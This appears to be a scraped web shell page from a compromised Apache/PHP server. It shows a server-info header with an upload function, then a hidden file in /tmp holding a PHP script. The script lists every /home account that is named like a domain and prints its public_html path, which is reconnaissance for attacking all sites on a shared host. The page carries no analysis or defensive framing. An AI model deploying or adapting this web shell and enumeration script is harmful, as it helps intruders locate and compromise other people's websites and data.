\x20\40\x20\40 HEX
HEX
Server: Apache
System: Linux web1.jenscom.net 4.18.0-553.111.1.el8_10.x86_64 #1 SMP Sun Mar 8 20:06:07 EDT 2026 x86_64
User: sps (1059)
PHP: 8.3.30
Disabled: NONE
Upload Files
File: //tmp/.content
<?php   $r = "/home"; $dir_public = "public_html"; function is_valid_domain($domain) {     if (!substr_count($domain, '.')) {         return false;     }     if (stripos($domain, 'www.') === 0) {         $domain = substr($domain, 4);     }     $again = 'http://' . $domain;     return filter_var($again, FILTER_VALIDATE_URL); }  $dirs = glob("{$r}/*", GLOB_ONLYDIR); foreach ($dirs as $path) {     $dir = basename($path);     if (is_valid_domain($dir)) {         if (strlen($dir_public)) {             if (is_dir("{$path}/{$dir_public}")) {                 print "<f>{$path}/{$dir_public}@@@{$dir}</f>\n";             }         } else {             print "<f>{$path}@@@{$dir}</f>\n";         }     } } die('!ended!');